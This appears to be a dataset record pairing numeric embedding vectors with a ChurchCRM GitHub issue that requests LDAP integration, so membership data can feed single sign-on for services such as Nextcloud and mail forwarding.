0.015807753428816795, -0.003201714251190424, 0.004872668068856001, -0.02609870582818985, 0.0022923515643924475, 0.007206698413938284, 0.022249070927500725, 0.002927010878920555, -0.003086149226874113, -0.019490672275424004, 0.014216369017958641, -0.004342206288129091, -0.0036185053177177906, -0.016232121735811234, -0.00898753385990858, 0.013322162441909313, 0.0029497449286282063, -0.011829291470348835, 0.0017742043128237128, -0.0029023822862654924, -0.013473722152411938, 0.002978162607178092, 0.016353370621800423, -0.004118654876947403, 0.02290078066289425, 0.007502241525799036, 0.01163984090089798, -0.010904773138463497, 0.010495560243725777, 0.009677133522927761, -0.01621696725487709, 0.026629168540239334, -0.006698971148580313, 0.0012882637092843652, 0.00017832031880971044, -0.00068865274079144, 0.016065405681729317, 0.013549502938985825, -0.015012061223387718, 0.006520887836813927, -0.009639243595302105, 0.0009690395090728998, -0.005778241436928511, -0.004687006585299969, -0.0193997360765934, -0.025325749069452286, 0.017550697550177574, -0.005850232671946287, -0.0021388966124504805, 0.01173835527151823, 0.005266725085675716, -0.012147569097578526, -0.01373895350843668, -0.010366733185946941, -0.009495261125266552, 0.017368825152516365, -0.005342505406588316, 0.011897494085133076, 0.01795991137623787, 0.025174187496304512, 0.01111695822328329, 0.005948747042566538, 0.00749466335400939, 0.0074454061686992645, -0.007911454886198044, -0.010927507653832436, -0.02467403933405876, 0.00032680219737812877, 0.0066724480129778385, 0.011768667958676815, -0.0021995208226144314, 0.006016949191689491, 0.0026030505541712046, 0.006608034949749708, -0.007449195254594088, 0.01614118553698063, 0.017353668808937073, 0.008957221172749996, -0.004861300811171532, -0.006740650162100792, 0.009533151052892208, 0.001219114288687706, -0.011185159906744957, -0.015315181575715542, 0.0037776438985019922, 0.01989988423883915, -0.016171498224139214, 0.03431328386068344, 0.015042372979223728, -0.002824707655236125, 0.0030236307065933943, 0.001335626351647079, -0.00008158214041031897, -0.006304914131760597, -0.002629573456943035, 0.003252865746617317, 0.006388272158801556, 0.015300026163458824, -0.0015724394470453262, -0.024764975532889366, 0.006937678903341293, 0.012041476555168629, -0.000563141715247184, 0.011442813090980053, 0.03060005232691765, -0.031130513176321983, -0.006107885390520096, -0.00571382837370038, 0.02767493575811386, -0.014466443099081516, -0.016171498224139214, -0.000050796425057342276, -0.019414890557527542, 0.014360351487994194, 0.05825982987880707, -0.011245784349739552, 0.0015013954835012555, -0.013125133700668812, -0.004505133721977472, -0.01797506771981716, -0.02484075538814068, 0.022703753784298897, -0.006441318430006504, 0.017232421785593033, 0.0039026811718940735, -0.013466144911944866, -0.003383586648851633, 0.0063844830729067326, -0.015565256588160992, 0.004543024115264416, 0.008017546497285366, 0.0073014236986637115, -0.0048044659197330475, -0.003626083256676793, 0.0038363735657185316, -0.008873863145709038, 0.011806557886302471, 0.00044899777276441455, 0.008396447636187077, 0.005831287708133459, 0.0017988329054787755, 0.0014218263095244765, -0.02453763410449028, 0.0015298131620511413, 0.007339314091950655, 0.03016052581369877, -0.027553686872124672, -0.00578960869461298, -0.016186654567718506, -0.002453384455293417, -0.008555586449801922, 0.0006337120430544019, -0.006418584380298853, 0.029069291427731514, -0.015421274118125439, -0.0013100504875183105, -0.00034266867442056537, -0.0095483073964715, -0.005372817162424326, 0.0024742239620536566, 0.00898753385990858, -0.0017429449362680316, 0.03892071917653084, 0.0020517492666840553, -0.0017344197258353233, 0.00851011835038662, -0.004777942784130573, 0.0033665362279862165, -0.010298531502485275, 0.010169705376029015, 0.0009316230425611138, 0.0038382678758352995, 0.021309396252036095, -0.01386777963489294, 0.004452087916433811, 0.015095419250428677, 0.002514008665457368, 0.018475215882062912, 0.001140492269769311, -0.022643128409981728, -0.015163620933890343, 0.013663172721862793, -0.00599421514198184, -0.004402830731123686, 0.0066383471712470055, -0.007399938069283962, -0.004198223818093538, 0.0033589580561965704, 0.0005456175422295928, -0.00826004333794117, -0.004668061155825853, -0.005986636970192194, 0.012124834582209587, 0.005876755807548761, 0.010882039554417133, -0.005800975486636162, 0.010791102424263954, 0.013307006098330021, 0.014337616972625256, -0.00137730548158288, -0.015807753428816795, -0.014360351487994194, 0.0005981900612823665, 0.015444007702171803, -0.01139734499156475, -0.02453763410449028, -0.03029693104326725, -0.008654100820422173, 0.0027583998162299395, -0.004539235029369593, -0.011594372801482677, 0.011063911952078342, 0.017747726291418076, -0.01927848719060421, 0.006024527363479137, -0.0008724197396077216, 0.00700967013835907, 0.0054751206189394, -0.010283375158905983, 0.02191563881933689, -0.013216069899499416, -0.006702760234475136, 0.030372710898518562, -0.028311489149928093, -0.019187550991773605, -0.010503138415515423, -0.007111973129212856, -0.013693485409021378, -0.012208192609250546, -0.011541326530277729, 0.0005612472305074334, -0.05237928405404091, 0.000786693359259516, -0.004986338317394257, 0.010935084894299507, 0.00782809592783451, 0.02597745880484581, 0.002830391051247716, 0.0036791295278817415, -0.0043573626317083836, -0.012685608118772507, 0.00045302361832000315, -0.010404624044895172, -0.0160957183688879, -0.005922223906964064, 0.0032926504500210285, 0.014269414357841015, -0.0008307406096719205, 0.05413738638162613, 0.006464052479714155, -0.001215325202792883, 0.006066206376999617, 0.00550922192633152, 0.011215471662580967, 0.011942962184548378, -0.015451585873961449, -0.012875058688223362, 0.014754408039152622, 0.012473423965275288, -0.008161528967320919, 0.0257955864071846, -0.0051265317015349865, 0.006357959937304258, -0.006005581934005022, -0.01292810495942831, 0.006149564404040575, -0.012465845793485641, -0.012609828263521194, 0.0026883031241595745, 0.006725494284182787, 0.022885626181960106, 0.004808254539966583, 0.0017903075786307454, 0.005566056817770004, 0.012973573058843613, 0.0072824787348508835, 0.00782051868736744, -0.03155488148331642, 0.014072386547923088, -0.012511313892900944, 0.010275796987116337, 0.008676834404468536, 0.005164421629160643, 0.01501963846385479, 0.010169705376029015, 0.016944456845521927, -0.009692289866507053, -0.009957520291209221, 0.016323057934641838, -0.002466646023094654, -0.014087541960179806, -0.005016650538891554, 0.010821415111422539, -0.017111172899603844, -0.0026958812959492207, 0.004156544804573059, 0.007180175743997097, -0.00015309972513932735, 0.004156544804573059, 0.013299427926540375, 0.013655595481395721, 0.0005555637180805206, -0.002063116291537881, -0.017126329243183136, -0.005039384588599205, -0.002351081231608987, -0.005634258966892958, -0.011556482873857021, -0.006376905366778374, -0.01576228439807892, -0.007934188470244408, -0.0018689295975491405, -0.0069604129530489445, 0.005206101108342409, 0.022021731361746788, 0.018884429708123207, -0.040466636419296265, -0.0011187054915353656, 0.0015440218849107623, 0.0011433339677751064, -0.0046756393276154995, -0.012632561847567558, -0.026371514424681664, -0.019702855497598648, 0.021809546276926994, -0.01615634188055992, -0.007403727155178785, 0.00907089188694954, -0.0160957183688879, -0.005387973506003618, -0.019581608474254608, -0.0037227030843496323, 0.002690197667106986, -0.01608056202530861, -0.03097895160317421, -0.01633821427822113, -0.01098055299371481, 0.031221449375152588, 0.023628272116184235, 0.026113862171769142, -0.01533791609108448, -0.004940870217978954, 0.0013394153211265802, -0.023688895627856255, 0.0045127118937671185, 0.013935982249677181, -0.006213977932929993, 0.014633160084486008, -0.0024117054417729378, 0.026022925972938538, -0.007183964364230633, 0.0019380790181457996, -0.003955727443099022, -0.013670750893652439, -0.017111172899603844, -0.018126627430319786, -0.0007170703029260039, 0.009086048230528831, 0.013996605761349201, 0.009790804237127304, -0.022127823904156685, -0.00028607030981220305, 0.01752038672566414, 0.012041476555168629, -0.00038576865335926414, 0.007437828462570906, 0.006361749023199081, 0.005058329552412033, -0.0037227030843496323, -0.0222945399582386, 0.0317973792552948, 0.005134109873324633, 0.00835855770856142, 0.0013953032903373241, 0.026492763310670853, 0.018111471086740494, 0.01714148558676243, 0.002978162607178092, -0.006615613121539354, -0.004410408437252045, 0.0011603846214711666, 0.0069642020389437675, -0.007956922985613346, 0.004891613032668829, -0.0008534747175872326, 0.013019041158258915, 0.025644024834036827, 0.0005299879121594131, -0.00882081687450409, 0.05247022211551666, 0.00031401426531374454, 0.0011054439237341285, 0.0018594571156427264, 0.005198522936552763, -0.008313089609146118, -0.01433003880083561, -0.009055735543370247, -0.019233018159866333, 0.022006575018167496, 0.004433142486959696, 0.021506424993276596, -0.004925713874399662, 0.005513010546565056, -0.0008506329031661153, 0.017505230382084846, 0.006604245863854885, -0.019611919298768044, 0.0035787206143140793, 0.01170804351568222, 0.0061988215893507, -0.00982869416475296, 0.0008747878600843251, 0.00797965656965971, 0.00042886866140179336, -0.007240799721330404, -0.010404624044895172, 0.02385561168193817, -0.0016453779535368085, -0.0244012288749218, 0.017868975177407265, -0.014367928728461266, -0.007180175743997097, 0.015807753428816795, 0.012230927124619484, -0.00735446996986866, -0.0005148318596184254, 0.020642530173063278, 0.020566750317811966, 0.008449493907392025, -0.0009766175644472241, -0.03616232052445412, 0.01914208196103573, 0.022491568699479103, -0.0006408164626918733, -0.01703539304435253, -0.03091832809150219, 0.006445107515901327, -0.006740650162100792, 0.01026064157485962, -0.0030937273986637592, 0.0255985576659441, -0.016201810911297798, -0.017747726291418076, 0.0219004824757576, 0.023082653060555458, -0.01523940172046423, -0.014852922409772873, -0.010343999601900578, 0.01163984090089798, -0.016565555706620216, -0.0195967648178339, 0.013284271582961082 ]
null
null
null
null
null
null
null
null
null
[ "ChurchCRM", "CRM" ]
**Is your feature request related to a problem? Please describe.** No <!-- A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] --> On self hosted systems there is a promary authentification provider available. LDAP is very common in that use eigher in several LDAP servers or even in the Microsoft ADS. So that the LDAP is the primary *standarized* data provider for personal data through all local services. SQL namings differs, but LDAP does not! LDAP(s) is queryable to authentificated users in may phone systems **Describe the solution you'd like** eigher synchonize all SQL data to an LDAP server or make the persolan data avalibale to be stored in LDAP natively <!--A clear and concise description of what you want to happen. --> I want to have CCRM as the primary data provider according to membership data. Nextcloud (and others) should access these personal data and make a SSO system available. Even a [email protected] leads into a direct forwarding for mail via postfix. **Describe alternatives you've considered** estract theese data vi python and cron, but who wants to wailt one minute after having changed the password. What about Changes made on ldap on other systems? how to syncronize theese back? <!-- A clear and concise description of any alternative solutions or features you've considered. --> none as for me I would be responsible to have debian packages and docker images available.
Feature request: LDAP integration for userdata
https://api.github.com/repos/ChurchCRM/CRM/issues/7040/comments
5
2024-05-20T22:33:43
2024-08-08T02:21:55Z
https://github.com/ChurchCRM/CRM/issues/7040
2,306,909,475
7,040
false
This is a GitHub Issue repo:CRM owner:ChurchCRM Title : Feature request: LDAP integration for userdata Issue date: --- start body --- **Is your feature request related to a problem? Please describe.** No <!-- A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] --> On self hosted systems there is a promary authentification provider available. LDAP is very common in that use eigher in several LDAP servers or even in the Microsoft ADS. So that the LDAP is the primary *standarized* data provider for personal data through all local services. SQL namings differs, but LDAP does not! LDAP(s) is queryable to authentificated users in may phone systems **Describe the solution you'd like** eigher synchonize all SQL data to an LDAP server or make the persolan data avalibale to be stored in LDAP natively <!--A clear and concise description of what you want to happen. --> I want to have CCRM as the primary data provider according to membership data. Nextcloud (and others) should access these personal data and make a SSO system available. Even a [email protected] leads into a direct forwarding for mail via postfix. **Describe alternatives you've considered** estract theese data vi python and cron, but who wants to wailt one minute after having changed the password. What about Changes made on ldap on other systems? how to syncronize theese back? <!-- A clear and concise description of any alternative solutions or features you've considered. --> none as for me I would be responsible to have debian packages and docker images available. --- end body ---
1,642
[ -0.0235386174172163, 0.015584677457809448, -0.01732681877911091, 0.007004039362072945, 0.011059839278459549, 0.016428157687187195, 0.022135445848107338, 0.03578878939151764, -0.027054432779550552, 0.007843578234314919, 0.007776572834700346, -0.016979968175292015, -0.0016140429070219398, 0.0077095674350857735, -0.005462914239615202, 0.025462068617343903, -0.022245807573199272, -0.009790677577257156, -0.009002378210425377, 0.024926025420427322, 0.014709665440022945, -0.012171341106295586, 0.027101730927824974, 0.00990103930234909, 0.01604977436363697, 0.019880909472703934, 0.02727515622973442, -0.005399850197136402, -0.03894198685884476, -0.0006237418274395168, 0.025067918002605438, 0.015158995985984802, 0.017720969393849373, -0.0037345681339502335, 0.009412294253706932, -0.03522121533751488, 0.013180364854633808, -0.0021362912375479937, -0.03411759436130524, 0.04600514844059944, -0.027858497574925423, 0.004434183705598116, -0.008198313415050507, 0.00620391545817256, 0.008923548273742199, 0.006570474710315466, 0.0037424510810524225, 0.02298680879175663, -0.04461774230003357, 0.011319978162646294, 0.019833611324429512, -0.08759582042694092, -0.01000351831316948, -0.01508804876357317, -0.0011450047604739666, -0.02833147719502449, 0.015434900298714638, 0.006357633974403143, -0.022923745214939117, -0.0000636182157904841, -0.018241247162222862, 0.05041962489485741, 0.012920225970447063, 0.011997915804386139, 0.00037099336623214185, 0.05426652356982231, -0.031941886991262436, 0.008631877601146698, -0.026833709329366684, -0.008545164950191975, -0.0019382309401407838, 0.03153197467327118, 0.05477103590965271, -0.0007942115771584213, 0.0189349502325058, -0.00508847227320075, 0.033013977110385895, 0.021536337211728096, -0.01709032990038395, 0.004580019041895866, 0.015222059562802315, 0.0029915960039943457, 0.0018722108798101544, 0.02861526608467102, 0.04632046818733215, -0.02561972849071026, -0.036514025181531906, -0.07750558853149414, -0.010949477553367615, -0.00815889798104763, -0.023712042719125748, -0.01791016012430191, 0.009767028503119946, -0.022230040282011032, -0.04357718676328659, -0.013992313295602798, -0.03227297589182854, -0.00406762445345521, -0.01740564964711666, 0.010720870457589626, 0.0028772924561053514, -0.0156635083258152, 0.007149874698370695, 0.011509169824421406, 0.023081405088305473, 0.02298680879175663, 0.015229943208396435, -0.02643955871462822, -0.009152155369520187, 0.0631585419178009, -0.00907332543283701, -0.03307703882455826, -0.031090525910258293, -0.013196130283176899, -0.013393205590546131, 0.012786215171217918, 0.01813088357448578, -0.0184304378926754, -0.029845012351870537, -0.016901137307286263, -0.0068542626686394215, -0.009254634380340576, -0.03257252648472786, -0.04811779037117958, -0.008923548273742199, -0.001488900394178927, -0.004540604073554277, 0.010389785282313824, 0.011966384015977383, 0.035914916545152664, -0.04433395341038704, 0.003119694534689188, -0.030680609866976738, 0.03203648328781128, 0.023680511862039566, 0.06378918141126633, 0.011036190204322338, 0.04679344594478607, -0.012344767339527607, 0.027448581531643867, -0.01627049781382084, -0.031200887635350227, -0.02989231050014496, 0.010500147007405758, 0.010697221383452415, 0.013416854664683342, 0.0014297779416665435, 0.011682596057653427, 0.03783836588263512, -0.016491221264004707, -0.004694322589784861, -0.01494615525007248, 0.036734748631715775, 0.0011420486262068152, 0.04010866954922676, -0.0318315252661705, 0.0031886708457022905, 0.002248623874038458, -0.007130167447030544, 0.03723926097154617, -0.05909091606736183, 0.017768267542123795, 0.0006700544035993516, -0.02159940078854561, -0.0066020069643855095, 0.005179126746952534, -0.008324440568685532, -0.005076647736132145, -0.017216457054018974, 0.04061318188905716, -0.026881007477641106, -0.034590575844049454, -0.011367276310920715, -0.017563309520483017, -0.03500048816204071, 0.03295091167092323, -0.002936414908617735, -0.04764481261372566, 0.0035591714549809694, -0.056000784039497375, -0.018367374315857887, 0.0027511646039783955, -0.009317697957158089, -0.006251213606446981, 0.01898224838078022, 0.01138304267078638, 0.01634932868182659, -0.011911203153431416, 0.046383533626794815, -0.02675487846136093, 0.0031531972344964743, 0.025840451940894127, 0.025745855644345284, -0.021221017464995384, -0.008907781913876534, -0.008537281304597855, -0.0025225577410310507, 0.013724290765821934, 0.036734748631715775, -0.02300257422029972, 0.0025245286524295807, -0.02511521615087986, -0.008229845203459263, -0.011729894205927849, -0.028489137068390846, 0.03465363755822182, 0.0038055148907005787, 0.05429805815219879, -0.009207336232066154, -0.03626176714897156, 0.025808919221162796, -0.002780725946649909, 0.015600443817675114, 0.016475455835461617, 0.011595883406698704, 0.009640900418162346, 0.001077013905160129, -0.02352285198867321, 0.022655721753835678, 0.02561972849071026, -0.02055884711444378, -0.01576598733663559, 0.006034431513398886, 0.007812046445906162, 0.030570248141884804, -0.018367374315857887, -0.002857584971934557, 0.02276608534157276, 0.008931430988013744, 0.02516251429915428, 0.06842438131570816, 0.022608425468206406, 0.0039178477600216866, 0.00581370759755373, 0.06123509258031845, 0.0013805092312395573, 0.0321626141667366, -0.05890172719955444, 0.008253494277596474, -0.012565490789711475, -0.008915665559470654, -0.004737678915262222, -0.03575725853443146, -0.003823251696303487, 0.010247890837490559, 0.011390925385057926, 0.006704485509544611, 0.05079801008105278, -0.006432522553950548, 0.0020949053578078747, 0.020480016246438026, 0.03202071785926819, -0.0009095003479160368, -0.03399146720767021, -0.01482002716511488, -0.010988892987370491, -0.0427258238196373, 0.02219850942492485, -0.018619630485773087, -0.030522949993610382, -0.02062191069126129, -0.014615069143474102, 0.0358518548309803, 0.048464640974998474, -0.03481129929423332, -0.0480862595140934, 0.0229552760720253, -0.000954334856942296, 0.011453988961875439, -0.01083911582827568, 0.022387700155377388, -0.016759242862462997, -0.022671489045023918, 0.021820126101374626, -0.026092708110809326, -0.009254634380340576, -0.029734650626778603, 0.00681090634316206, 0.006712368689477444, 0.03881585970520973, -0.024721067398786545, -0.007607088424265385, 0.052500735968351364, 0.00017872224270831794, -0.019313333556056023, 0.003019186435267329, -0.06114049628376961, -0.059185512363910675, -0.04622587189078331, 0.012399948202073574, -0.03427525609731674, 0.008474217727780342, -0.014709665440022945, 0.006432522553950548, 0.007276002783328295, 0.032730188220739365, 0.0073351250030100346, 0.02829994633793831, -0.026849474757909775, 0.008836835622787476, 0.02248229645192623, -0.014938272535800934, -0.012005798518657684, 0.026597218587994576, 0.009207336232066154, 0.03667168319225311, -0.04007713869214058, 0.03159503638744354, -0.03717619553208351, -0.005754584912210703, 0.01213980931788683, -0.03049141727387905, -0.01388983428478241, 0.0010642040288075805, 0.011453988961875439, 0.044523146003484726, 0.011249030940234661, -0.011658946983516216, 0.028268413618206978, -0.03670321777462959, -0.0283157117664814, 0.01579751819372177, -0.07542447745800018, 0.005194892641156912, 0.043451059609651566, -0.0437348447740078, -0.04405016452074051, -0.010074465535581112, 0.022277338430285454, -0.026612985879182816, -0.012983289547264576, -0.01054744515568018, 0.02323906309902668, -0.007524317130446434, -0.010066581889986992, -0.04162220284342766, -0.00841115415096283, 0.0015164908254519105, 0.02159940078854561, -0.014047494158148766, -0.005285547114908695, -0.03932037204504013, -0.026549920439720154, -0.00043331828783266246, 0.039414964616298676, -0.004146454390138388, 0.00270977895706892, 0.043135739862918854, 0.033045507967472076, -0.030349524691700935, 0.0009799546096473932, -0.005817648954689503, 0.00207519787363708, 0.01322766300290823, 0.0032280858140438795, 0.012865045107901096, 0.008560930378735065, -0.0232863612473011, -0.0181781817227602, 0.018004756420850754, 0.019092610105872154, -0.055685464292764664, -0.00882106926292181, 0.03950956091284752, -0.008001238107681274, 0.017547542229294777, -0.00037542753852903843, 0.0028910876717418432, 0.038563601672649384, -0.027842732146382332, -0.01612072065472603, -0.00002968439548567403, 0.02722785808146, 0.0064679961651563644, -0.08324440568685532, 0.01613648794591427, -0.014867325313389301, 0.011990033090114594, -0.003094074781984091, 0.02055884711444378, 0.020227760076522827, -0.022639956325292587, -0.03812215477228165, 0.01981784589588642, 0.013109417632222176, -0.006282745394855738, 0.03232027217745781, 0.026502622291445732, 0.03373920917510986, 0.023853937163949013, -0.009372878819704056, 0.02595081366598606, 0.016207434237003326, -0.04871689900755882, -0.031973421573638916, 0.012675853446125984, 0.01095736026763916, -0.021693997085094452, -0.020779570564627647, 0.008844718337059021, -0.013180364854633808, -0.026360729709267616, -0.014417994767427444, 0.018840353935956955, 0.017232222482562065, -0.023601680994033813, 0.011225382797420025, -0.02136291190981865, 0.009656666778028011, -0.01767367124557495, -0.04124382138252258, -0.009727614000439644, -0.04953673109412193, -0.000566097442060709, 0.021835891529917717, 0.022356169298291206, -0.011406690813601017, 0.022324636578559875, -0.03850053995847702, 0.02221427485346794, 0.012872927822172642, -0.03323470056056976, -0.004272582475095987, 0.032982442528009415, -0.02834724448621273, 0.005967425648123026, 0.006570474710315466, 0.002946268767118454, 0.045027658343315125, 0.002351102652028203, 0.04789706692099571, -0.006917326711118221, 0.0141578558832407, -0.018099352717399597, 0.014149973168969154, 0.0003185221867170185, -0.012999055907130241, -0.03189459070563316, -0.00794999860227108, 0.0070276884362101555, -0.04575289413332939, 0.011264797300100327, 0.003098016371950507, -0.0025304409209638834, -0.016901137307286263, -0.011146552860736847, -0.018036289140582085, -0.005348610691726208, 0.005384084302932024, -0.002573797246441245, 0.025257110595703125, 0.0010632186895236373, -0.057041339576244354, -0.03850053995847702, -0.030901333317160606, -0.03314010426402092, -0.011863905005156994, -0.004875631537288427, 0.03151620551943779, 0.003994707018136978, 0.009333464317023754, -0.008600345812737942, 0.023459788411855698, 0.010200593620538712, 0.032793253660202026, -0.009885273873806, -0.043955571949481964, -0.0358518548309803, 0.02241923287510872, -0.0075913225300610065, 0.028126519173383713, 0.02107912302017212, 0.03846900537610054, -0.0006823716103099287, -0.01764213852584362, 0.056000784039497375, 0.005080589093267918, 0.013479918241500854, -0.02114218845963478, 0.022545360028743744, -0.0315004400908947, -0.021993551403284073, -0.00440265191718936, 0.023585915565490723, 0.005537802819162607, -0.005171243567019701, -0.00016591236635576934, 0.028536435216665268, -0.02002280205488205, -0.01538760308176279, 0.011430339887738228, -0.01660158298909664, -0.026660282164812088, -0.02834724448621273, 0.004319880157709122, -0.0068936776369810104, 0.025871984660625458, -0.01871422678232193, 0.04269429296255112, -0.008080068044364452, -0.0147017827257514, -0.002311687683686614, 0.03295091167092323, -0.024689534679055214, 0.03345542401075363, 0.015529496595263481, -0.019770547747612, -0.001734258490614593, -0.006231506355106831, -0.003683328628540039, 0.004292289726436138, 0.0008493924979120493, -0.03042835369706154, -0.010216359049081802, -0.009774911217391491, -0.01015329547226429, 0.005108179524540901, 0.0090890908613801, 0.029718885198235512, -0.0032931205350905657, -0.022561127319931984, -0.00017046973516698927, -0.011832373216748238, 0.01591576263308525, 0.0073351250030100346, 0.02858373336493969, 0.03392840176820755, 0.027353987097740173, 0.018083587288856506, -0.019644418731331825, -0.014615069143474102, -0.015040750615298748, 0.028236880898475647, 0.005167302209883928, -0.006046255584806204, 0.04086543619632721, 0.017768267542123795, -0.0288990531116724, -0.0009001392754726112, -0.009112739935517311, -0.03386534005403519, 0.025462068617343903, -0.03793296217918396, -0.02729092165827751, 0.020117398351430893, 0.022860679775476456, -0.003111811587586999, -0.009301931597292423, 0.022103913128376007, -0.009893156588077545, -0.004749503452330828, -0.03232027217745781, 0.0020357829052954912, -0.014938272535800934, -0.003525668755173683, -0.040487054735422134, 0.012321118265390396, 0.011690478771924973, -0.01631779596209526, -0.025998111814260483, 0.028520669788122177, 0.01108348835259676, 0.008789537474513054, -0.017500244081020355, 0.013385322876274586, 0.010192709974944592, 0.018241247162222862, 0.023727810010313988, 0.00768197700381279, -0.026408027857542038, 0.025745855644345284, 0.013093652203679085, -0.010184827260673046, -0.011706245131790638, 0.0043356460519135, 0.008521515876054764, 0.023081405088305473, -0.003245822386816144, 0.005853122565895319, -0.015032867901027203, -0.010846998542547226, 0.01628626324236393, -0.05004123970866203, 0.010531678795814514, 0.018335841596126556, 0.024500342085957527, 0.0012878839625045657, -0.036766279488801956, -0.0012543812626972795, -0.03173692896962166, 0.012202873826026917, 0.014764846302568913, 0.005127887241542339, -0.0031236361246556044, 0.03932037204504013, 0.019549822434782982, -0.019045311957597733, 0.04997817799448967, 0.01594729535281658, 0.005967425648123026, -0.06448288261890411, 0.01712186075747013, 0.01680654101073742, 0.020196229219436646, -0.010681455954909325, 0.01633356139063835, -0.007563732098788023, -0.017153393477201462, 0.008655526675283909, -0.010886413976550102, -0.04177986457943916, 0.018808821216225624, 0.05991074815392494, -0.012092511169612408, 0.009199453517794609, -0.018903417512774467, 0.0385320708155632, -0.005218541715294123, 0.026234600692987442, -0.020448483526706696, 0.0027649598196148872, -0.024642236530780792, 0.0032990325707942247, -0.01324342843145132, 0.011698361486196518, -0.012076745741069317, 0.007882993668317795, 0.009443826042115688, -0.007595263887196779, 0.028788691386580467, -0.018288543447852135, -0.011446106247603893, -0.00013967679115012288, -0.010161178186535835, -0.006097495090216398, 0.011887554079294205, -0.0026013876777142286, -0.014394345693290234, -0.021299848333001137, 0.012179224751889706, -0.01898224838078022, 0.03632483258843422, 0.0012780302204191685, 0.06344232708215714, -0.0291513092815876, -0.029561225324869156, -0.014039610512554646, -0.0009375835070386529, 0.026660282164812088, 0.037302322685718536, -0.03295091167092323, -0.03629330173134804, 0.003098016371950507, 0.005096354987472296, 0.012084628455340862, -0.014079025946557522, 0.011438223533332348, 0.03985641524195671, -0.007011922542005777, -0.01135150995105505, -0.011288446374237537, 0.008828951977193356, -0.012060979381203651, -0.00789087638258934, 0.015687156468629837, -0.004934753756970167, 0.008316557854413986, -0.0013608017470687628, 0.007808104623109102, 0.02347555384039879, 0.024752598255872726, -0.01735835149884224, -0.013125183992087841, 0.007090752478688955, -0.0005463899578899145, 0.00830867514014244, -0.013472035527229309, 0.00043750612530857325, -0.00813524890691042, 0.0013056207681074739, -0.01536395400762558, -0.005399850197136402, 0.010886413976550102, -0.046635787934064865, -0.010910063050687313, 0.008363856002688408, -0.01712186075747013, 0.002161910990253091, -0.014189387671649456, 0.002556060440838337, -0.0005882683908566833, -0.013235545717179775, 0.016010358929634094, 0.023680511862039566, 0.011997915804386139, -0.009270399808883667, -0.010366136208176613, 0.03285631537437439, -0.03843747451901436, 0.008348089642822742, -0.020905697718262672, -0.012612788937985897, 0.018367374315857887, -0.025745855644345284, -0.017752500250935555, 0.00007273293158505112, 0.015127464197576046, -0.003888286417350173, -0.012778332456946373, 0.012660087086260319, -0.008332324214279652, -0.032146845012903214, -0.05000970885157585, 0.01660158298909664, -0.02062191069126129, 0.043671783059835434, 0.022592658177018166, -0.026786411181092262, -0.043419525027275085, 0.00653894292190671, -0.017957458272576332, -0.014615069143474102, -0.02297104150056839, -0.0030842211563140154, 0.0044617741368710995, -0.019707482308149338, -0.004611550830304623, 0.005679696798324585, -0.012865045107901096, 0.012983289547264576, -0.008024887181818485, -0.0007671137573197484, 0.04307267442345619, 0.009798560291528702, -0.01874575763940811, -0.03481129929423332, 0.03019186481833458, -0.010910063050687313, 0.00448542321100831, -0.0029600639827549458, 0.012597023509442806, 0.00045943071017973125, -0.0015135346911847591, -0.027968859300017357, 0.0064679961651563644, -0.010610508732497692, 0.003730626543983817, 0.05190162733197212, -0.02268725447356701, 0.006231506355106831, 0.03547346964478493, 0.02161516807973385, 0.01707456260919571, -0.024658001959323883, -0.015198410488665104, 0.0063103362917900085, 0.0373653881251812, 0.02375934086740017, -0.003048747545108199, 0.01631779596209526, 0.0437348447740078, 0.0038922280073165894, -0.017279520630836487, 0.036514025181531906, 0.004540604073554277, -0.007343008182942867, 0.013803120702505112, 0.0033404184505343437, 0.014473175629973412, -0.030349524691700935, 0.03452751040458679, 0.0071222842670977116, 0.006625655572861433, -0.004158278927206993, 0.008521515876054764, -0.0021914721000939608, -0.03424372151494026, -0.03711313381791115, -0.02828417904675007, 0.021315613761544228, -0.002329424489289522, -0.02883598953485489, -0.02163093350827694, -0.019565589725971222, 0.025052152574062347, -0.03127971664071083, 0.02084263414144516, -0.002634890377521515, 0.0021914721000939608, -0.009696081280708313, 0.007693801540881395, -0.01068933866918087, 0.00015667449042666703, -0.015655623748898506, 0.05291065201163292, -0.02774813584983349, 0.00454454543069005, -0.0055693346075713634, 0.0015963061014190316, -0.014323398470878601, 0.003939525689929724, 0.006274862680584192, -0.021489039063453674, -0.022513829171657562, -0.014228803105652332, 0.022498061880469322, -0.0009705935372039676, 0.03616717457771301, -0.023980066180229187, 0.02271878719329834, -0.0030999870505183935, 0.006038372870534658, -0.012762566097080708, 0.03692394122481346, 0.012699502520263195, -0.013456269167363644, -0.0015588619280606508, 0.007713508792221546, -0.010161178186535835, 0.04354565590620041, -0.02911977656185627, 0.017043031752109528, 0.020779570564627647, -0.007965764962136745, -0.013196130283176899, -0.019313333556056023, -0.006140851881355047, -0.004469657316803932, 0.021189486607909203, -0.004018355626612902, -0.004497247748076916, 0.008151015266776085, 0.03202071785926819, -0.02137867733836174, -0.01896648108959198, 0.019691716879606247, 0.030349524691700935, -0.0033049448393285275, -0.03714466467499733, 0.03660862147808075, 0.009396527893841267, 0.006795139983296394, -0.0320049524307251, -0.023869702592492104, 0.011532818898558617, -0.029245905578136444, -0.0336761474609375, -0.0095068896189332, -0.0020692856051027775, 0.02107912302017212, 0.031216653063893318, -0.006716310046613216, -0.022340402007102966, 0.044491615146398544, 0.020700739696621895, 0.02486295998096466, 0.005683638155460358, 0.009538421407341957, 0.015758102759718895, -0.021962018683552742, 0.02836300991475582, 0.01765790395438671, -0.015742337331175804, -0.0021914721000939608, 0.006653246469795704, -0.040991563349962234, -0.010484380647540092, -0.04780247062444687, -0.00045031600166112185, 0.02913554385304451, -0.0067360177636146545, -0.03124818578362465, 0.029750416055321693, -0.008458451367914677, -0.019297568127512932, 0.025257110595703125, -0.0013745969627052546, 0.00307239661924541, -0.002274243626743555, -0.015813283622264862, -0.014118440449237823, 0.013550865463912487, -0.049568261951208115, -0.013117300346493721, 0.054392654448747635, -0.04572135955095291, 0.01400807872414589, 0.00010654357902240008, 0.050135836005210876, -0.013590279966592789, 0.0008252508705481887, 0.022056614980101585, 0.004915046505630016, -0.006732076406478882, 0.008828951977193356, 0.02405889518558979, -0.00533284479752183, -0.015277240425348282, -0.029072478413581848, -0.011690478771924973, -0.01203733030706644, 0.017200691625475883, -0.019612887874245644, -0.0033187400549650192, 0.029545458033680916, 0.040518585592508316, 0.01713762804865837, -0.018304310739040375, -0.0048125674948096275, 0.010476497933268547, -0.028536435216665268, -0.003783836727961898, -0.028268413618206978, 0.004331704694777727, -0.013180364854633808, 0.03477976471185684, -0.006806964520365, 0.03135854750871658, -0.00047913819435052574, 